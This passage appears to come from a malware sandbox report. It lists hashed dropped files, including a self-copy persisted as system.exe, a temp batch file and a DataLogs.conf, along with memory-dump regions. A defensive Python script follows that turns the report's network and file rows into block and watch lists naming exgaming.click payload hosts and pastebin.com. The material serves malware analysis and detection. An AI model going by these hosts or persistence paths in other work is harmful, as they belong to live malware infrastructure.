MD5 2f57fde6b33e89a63cf0dfdd6e60a351
SHA1 445bf1b07223a04f8a159581a3d37d630273010f
SHA256 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA512 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

memory/3732-22-0x00007FFE8F310000-0x00007FFE8FDD1000-memory.dmp

memory/3732-32-0x000001B0FFAD0000-0x000001B0FFAE0000-memory.dmp

memory/3732-33-0x000001B0FFAD0000-0x000001B0FFAE0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 aa8efa56e1e40374bbd21e0e469dceb7
SHA1 33a592799d4898c6efdd29e132f2f76ec51dbc08
SHA256 25eb4f899ae8f90b66b9342781456700d1af487f6f302fe5a727328b026f6bdf
SHA512 ad6de575b83db36b239317e4c46a1eaeb0383d5909a12b69ee2b38798c2b5cb0d19b464f5689037501d20592d92c4d3d84f0e49fdb1c0648b6593481a183f096

memory/3732-35-0x000001B0FFAD0000-0x000001B0FFAE0000-memory.dmp

memory/3732-36-0x000001B0FFAD0000-0x000001B0FFAE0000-memory.dmp

memory/3732-38-0x00007FFE8F310000-0x00007FFE8FDD1000-memory.dmp

memory/2884-39-0x00007FFE8F310000-0x00007FFE8FDD1000-memory.dmp

memory/2884-40-0x000001B8643C0000-0x000001B8643D0000-memory.dmp

memory/4844-41-0x00007FFE8F310000-0x00007FFE8FDD1000-memory.dmp

memory/2884-42-0x000001B8643C0000-0x000001B8643D0000-memory.dmp

memory/4844-43-0x000000001BA80000-0x000000001BA90000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 b0cfdab278bf3db6d14817b1e701e4ee
SHA1 7ec7d56340dcaff7b6bf3d0e4b35be5bd57e87b8
SHA256 0554687e2254846915ac9d734989c77cfc0417bdd6607dd64dde2fb2dcc55854
SHA512 40a621b3ef79c9f74c937b4f04ef18bcc78bc7436c2035885bd8651b4ffc072152c6e87087be432c43860256c5e89ef33d57bb27822d36f18b8b9bda9208d4ca

memory/4844-58-0x00007FFEAD390000-0x00007FFEAD585000-memory.dmp

memory/4844-59-0x00007FFE8F310000-0x00007FFE8FDD1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmp3DB0.tmp.bat

MD5 1f9b81a0d5f841ddcb6d6ba26296cae9
SHA1 9960c39484124a23ecb21e3e0e97e15cc23fa234
SHA256 d27c0b58577729e9f67c456542e97e574852dc8ad8378f291a71f445943f9b76
SHA512 f82189b1d33b475a37190a86326a627ee36db6205d6647c68e49e3a3d29e2747d48770fb2ef097887114002686da5cf1b628a98c1c65ceec20200adf30e7e348

memory/2884-61-0x000001B8643C0000-0x000001B8643D0000-memory.dmp

memory/2884-63-0x00007FFE8F310000-0x00007FFE8FDD1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 241e99fde6d6236ed49dff9334877997
SHA1 98d7945fe51411bd8c8dcf8edca7ec0197ab22f0
SHA256 ee3d1bd42ecdaa6b7a98bf2a24d93e5a8af73426ce952ca3306bdf55373a31f9
SHA512 0988c412228378ae8763f4554719c3f7ccf19d081c9e7733a5887dabe656f00ccb705d1396e4155909d7f961405b44fca008c8468de36db28199c30e49d52eb5

memory/2244-75-0x000002CA81610000-0x000002CA81620000-memory.dmp

memory/2244-74-0x000002CA81610000-0x000002CA81620000-memory.dmp

memory/2244-73-0x00007FFE8F310000-0x00007FFE8FDD1000-memory.dmp

memory/2244-77-0x000002CA81610000-0x000002CA81620000-memory.dmp

memory/2244-79-0x00007FFE8F310000-0x00007FFE8FDD1000-memory.dmp

C:\Users\Admin\AppData\Roaming\system.exe

MD5 a7d63348cfe9b0dc9d3aaec28c76c8f0
SHA1 1b993f554960286e90cfd7cedf4c457e1c46ff80
SHA256 16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54
SHA512 3910836ccae023d562c66bfd754b0d1e3aadc4c1cbf57e96e8220c1de6534a529ec3630d595a7baba7c56ca503b6ce6d012b9c388b9f896f2a0a8be317ca5010

memory/436-83-0x00007FFE8EFE0000-0x00007FFE8FAA1000-memory.dmp

C:\Users\Admin\AppData\Roaming\MyData\DataLogs.conf

MD5 cf759e4c5f14fe3eec41b87ed756cea8
SHA1 c27c796bb3c2fac929359563676f4ba1ffada1f5
SHA256 c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761
SHA512 c7f832aee13a5eb36d145f35d4464374a9e12fa2017f3c2257442d67483b35a55eccae7f7729243350125b37033e075efbc2303839fd86b81b9b4dca3626953b

memory/3564-95-0x00007FFE8EFE0000-0x00007FFE8FAA1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 c3952ebc673efa6fd4e7ed0f8cfc8e9d
SHA1 e4b74b78e8ebdcfdc5fb62b5828554acfd2ef72f
SHA256 fb1870ff8cc1f2ca384d87ea7e86d26ed967b286a059844b0003f15ac9fd9c1e
SHA512 d641b37ff72442fe239d226aff2b34acd32c540d1ddd42ee513a3f915f3ae1edc9dab33a19736fcaa0830314264d1821b0a592d6a4076e3169b3d470e723f49e

memory/3564-97-0x000001D55E270000-0x000001D55E280000-memory.dmp

memory/3564-96-0x000001D55E270000-0x000001D55E280000-memory.dmp

memory/3564-99-0x00007FFE8EFE0000-0x00007FFE8FAA1000-memory.dmp

memory/4360-105-0x00007FFE8EFE0000-0x00007FFE8FAA1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 db6a77fc1a2afe95c10ac61dc57cfc81
SHA1 9f2dfbe5d95a5e67eae5dc6e01d622fc23f9c745
SHA256 43ed7034f0c166ae5b52e3b624c5bd79749df4f2d938847508da75c70daa1950
SHA512 30331b60a50d77cec9b027e386b05593f539e11978fc8ae62ac288794ff2194de423b93e7c439eb88b456142f04b125fe4a41e5569aa877445f3b23ff3c51cff

memory/4360-111-0x00000266FDAF0000-0x00000266FDB00000-memory.dmp

memory/4360-106-0x00000266FDAF0000-0x00000266FDB00000-memory.dmp

memory/4360-116-0x00007FFE8EFE0000-0x00007FFE8FAA1000-memory.dmp

memory/4360-114-0x00000266FDAF0000-0x00000266FDB00000-memory.dmp

memory/4360-113-0x00000266FDAF0000-0x00000266FDB00000-memory.dmp

memory/1440-123-0x0000022CCA8B0000-0x0000022CCA8C0000-memory.dmp

memory/1440-122-0x00007FFE8EFE0000-0x00007FFE8FAA1000-memory.dmp

memory/1440-128-0x0000022CCA8B0000-0x0000022CCA8C0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d4d9aa0d1f59c308165fcfde8af102ff
SHA1 06c80e42d7c81fe712fb01ee00cc4375bd56ef78
SHA256 ce8919c2f373fbeb62d6ecae9ab255bbeb265be6f3a8f58716dcafe04fda9ccb
SHA512 f0fd85d74956c0b91a1f45a1b66db51032ade95490692b281ca7a21ed44e44acda13eda3fa18288b2d8c7292d4678450754dc2a2177957fac534326953e64aa1

memory/436-129-0x00007FFE8EFE0000-0x00007FFE8FAA1000-memory.dmp

memory/1440-132-0x00007FFE8EFE0000-0x00007FFE8FAA1000-memory.dmp

memory/2420-133-0x00007FFE8EFE0000-0x00007FFE8FAA1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 fde6e408bc8837cf76db7bcb99e7d6a4
SHA1 23116a5ea5723f24d9c602ff2c5404b22f419213
SHA256 e16b6c2735cb26e19f9a20b78fd90c7030b9a6448614835966187c1156b37829
SHA512 c32781d435ff0384d9b110499a3a157fb0d3b1e7a351a4d8d72a73998c12e4e3d76d3dbbdb4ab3326a8ffe39c5bc2bcaa09bc4549351fc819b2109b7ca40c30e

memory/436-144-0x00007FFEAD390000-0x00007FFEAD585000-memory.dmp

memory/2420-146-0x00000213C62D0000-0x00000213C62E0000-memory.dmp

memory/2420-147-0x00007FFE8EFE0000-0x00007FFE8FAA1000-memory.dmp

memory/436-148-0x00007FFEAD390000-0x00007FFEAD585000-memory.dmp
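Turning the Network and Files sections into indicators takes some triage: most Network rows are UDP lookups against the sandbox's resolver (forward lookups of the payload hosts and of pastebin.com, plus in-addr.arpa reverse lookups that only name an IP), two rows are actual TCP connections, and most of the Files entries (the __PSScriptPolicyTest script, the CLR UsageLogs entry, the StartupProfileData cache) are written by PowerShell and the .NET runtime whenever they start rather than by the payload. The SHA256 of C:\Users\Admin\AppData\Roaming\system.exe is the sample's own hash, so the persisted file is a byte-identical copy. The following is an added example for this page, not the sandbox vendor's code: NETWORK is a representative subset of the rows above and FILES the hashed entries (one StartupProfileData entry kept); treating 8.8.8.8:53 as the resolver, the housekeeping path patterns, and handling pastebin.com as watch-only are this example's own assumptions.

```python
"""Indicator triage over the Network and Files sections above.

Added example; not part of the sandbox report. NETWORK is a representative
subset of the report's rows and FILES lists the hashed files from the report
(StartupProfileData appears several times on the page with different hashes;
one is kept). Treating 8.8.8.8:53 as the sandbox resolver, the housekeeping
path patterns, and pastebin.com as watch-only are this example's own
assumptions; the report itself only flags "legitimate hosting services".
"""
import re
from typing import Dict, List, Tuple

SAMPLE_SHA256 = "16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54"
RESOLVER = "8.8.8.8:53"        # udp rows to this destination are lookups, not contacts
WATCH_ONLY = {"pastebin.com"}  # legitimate service abused for hosting: alert, do not block outright

NETWORK: List[Tuple[str, str, str, str]] = [  # (country, destination, domain, proto)
    ("US", "8.8.8.8:53", "133.32.126.40.in-addr.arpa", "udp"),
    ("US", "8.8.8.8:53", "xcu.exgaming.click", "udp"),
    ("US", "8.8.8.8:53", "xcu5.exgaming.click", "udp"),
    ("US", "8.8.8.8:53", "0.205.248.87.in-addr.arpa", "udp"),
    ("US", "8.8.8.8:53", "xcu.exgaming.click", "udp"),
    ("US", "8.8.8.8:53", "pastebin.com", "udp"),
    ("US", "104.20.4.235:443", "pastebin.com", "tcp"),
    ("US", "8.8.8.8:53", "235.4.20.104.in-addr.arpa", "udp"),
    ("US", "20.189.173.4:443", "", "tcp"),
]

FILES: List[Tuple[str, str]] = [  # (path, sha256) from the report's Files section
    (r"C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2zj2lopo.khu.ps1",
     "96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7"),
    (r"C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log",
     "3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55"),
    (r"C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive",
     "25eb4f899ae8f90b66b9342781456700d1af487f6f302fe5a727328b026f6bdf"),
    (r"C:\Users\Admin\AppData\Local\Temp\tmp3DB0.tmp.bat",
     "d27c0b58577729e9f67c456542e97e574852dc8ad8378f291a71f445943f9b76"),
    (r"C:\Users\Admin\AppData\Roaming\system.exe",
     "16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54"),
    (r"C:\Users\Admin\AppData\Roaming\MyData\DataLogs.conf",
     "c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761"),
]

# Files PowerShell / the CLR write whenever they start; they show PowerShell ran, not what it did.
HOUSEKEEPING = re.compile(r"__PSScriptPolicyTest_|\\CLR_v4\.0\\UsageLogs\\|StartupProfileData", re.I)


def ptr_to_ip(name: str) -> str:
    """'235.4.20.104.in-addr.arpa' -> '104.20.4.235' (PTR labels are the octets in reverse)."""
    octets = name[: -len(".in-addr.arpa")].split(".")
    return ".".join(reversed(octets))


def triage_network(rows: List[Tuple[str, str, str, str]]) -> Dict[str, list]:
    """Split rows into forward lookups, reverse lookups (as the IP looked up) and real connections."""
    out: Dict[str, list] = {"dns_queries": [], "reverse_lookups": [], "connections": []}
    for _country, dest, domain, proto in rows:
        if dest == RESOLVER and proto == "udp":
            if domain.endswith(".in-addr.arpa"):
                out["reverse_lookups"].append(ptr_to_ip(domain))
            else:
                out["dns_queries"].append(domain.lower())
        else:
            out["connections"].append((dest, domain or None, proto))
    return {k: list(dict.fromkeys(v)) for k, v in out.items()}  # de-duplicate, keep order


def connections_corroborated_by_ptr(net: Dict[str, list]) -> List[str]:
    """IPs that appear both as a connection destination and as a reverse lookup."""
    contacted = {dest.rsplit(":", 1)[0] for dest, _domain, _proto in net["connections"]}
    return sorted(ip for ip in net["reverse_lookups"] if ip in contacted)


def triage_files(files: List[Tuple[str, str]], sample_sha256: str = SAMPLE_SHA256) -> Dict[str, str]:
    """Label each dropped file: self-copy of the sample, PowerShell housekeeping, or payload artifact."""
    verdicts: Dict[str, str] = {}
    for path, sha256 in files:
        if sha256.lower() == sample_sha256:
            verdicts[path] = "copy_of_sample"
        elif HOUSEKEEPING.search(path):
            verdicts[path] = "powershell_housekeeping"
        else:
            verdicts[path] = "payload_artifact"
    return verdicts


def indicators(rows=NETWORK, files=FILES) -> Dict[str, list]:
    """Assemble a blocklist / watchlist from the two triage passes."""
    net = triage_network(rows)
    verdicts = triage_files(files)
    return {
        "block_domains": sorted(d for d in net["dns_queries"] if d not in WATCH_ONLY),
        "watch_domains": sorted(d for d in net["dns_queries"] if d in WATCH_ONLY),
        "connections": [f"{dest} {domain or '(no domain in report)'} {proto}"
                        for dest, domain, proto in net["connections"]],
        "ptr_corroborated": connections_corroborated_by_ptr(net),
        "file_hashes": sorted({sha for path, sha in files
                               if verdicts[path] != "powershell_housekeeping"}),
    }


if __name__ == "__main__":
    for key, values in indicators().items():
        print(key, values)
```

The reverse-lookup pass is what lets the 235.4.20.104.in-addr.arpa row corroborate the 104.20.4.235:443 connection to pastebin.com; the other in-addr.arpa rows name addresses the report never shows a connection to, so they stay out of the indicator list. The 20.189.173.4:443 connection has no domain in the report and is emitted as-is for analyst review rather than guessed at.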